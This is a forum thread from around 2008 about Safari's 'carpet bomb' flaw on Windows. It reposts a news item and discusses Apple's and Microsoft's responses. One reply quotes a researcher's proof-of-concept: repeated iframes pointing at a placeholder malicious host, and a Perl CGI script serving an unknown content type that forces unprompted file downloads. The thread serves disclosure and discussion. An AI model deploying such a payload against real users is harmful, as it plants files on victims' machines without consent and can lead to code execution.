Apples carpet-bomb Safari flaw can wreak havoc on Windows

Discuss Windows 2000, NT, XP and Windows Server 2000, 2003, SBS 2003.
Post Reply
seika
FTP Access
Posts: 140
Joined: Wed Jun 11, 2008 7:27 pm

Apples carpet-bomb Safari flaw can wreak havoc on Windows

Post by seika »

A researcher has created a proof-of-concept site that graphically demonstrates the risk Windows users face when using Apple's Safari browser.




Microsoft's security team already warned that a "blended threat" was so serious that Windows users should curtail their use of Safari until a security patch is available. This blog post from researcher Liu Die Yu makes it clear the warning was by no means overstated.

Clicking on this link with Safari using default settings automatically downloads a booby-trapped file onto a Windows user's desktop with no prompting. The next time the user opens Internet Explorer, the force-fed file automatically causes the notepad.exe application to launch and open a non-existent file. Of course, miscreants could choose far more nefarious code.

When informed that its browser downloads files with no prompting, Apple said it may get around to changing this behavior at some point. In other words, this is no big deal from a security perspective, so let's all move on. This demo suggests otherwise.

source: neowin.net

hounsell

Post by hounsell »

The thing with this, from what I heard, is that neither can completely fix it without the other. The flaw is in both Safari and Windows. Small holes in both that normally wouldn't be able to be exploited, take effect when used in conjunction.

seika
FTP Access
Posts: 140
Joined: Wed Jun 11, 2008 7:27 pm

Post by seika »

well it's another reason not to use safari on windows.

Frozenport
User avatar
FTP Access
Posts: 1022
Joined: Fri Sep 01, 2006 10:04 pm
Location: The Ephemeral between existance and non-existance: AKA "being"
Contact:

Post by Frozenport »

The only Windows users of Safari are web developers...
What is the flaw?
Image
Part Time Troll - HPC Enthusiast - Spelling Master - Old Fart

pr0gram the pr0grammer
Donator
Posts: 698
Joined: Fri Aug 18, 2006 12:05 pm
Location: Or-stray-liagh

Post by pr0gram the pr0grammer »

[quote=http://www.dhanjani.com/archives/2008/0 ... _bomb.html]
Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
</HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
[/quote]


Such simple exploit code o.O

And of course, Apple is being all arrogant and saying it's a feature not a bug. They said they will consider an "ask before downloading" checkbox in the next version of Safari.
pr0gram the pr0grammer
BetaArchive retiree | OSBA Expat

Post Reply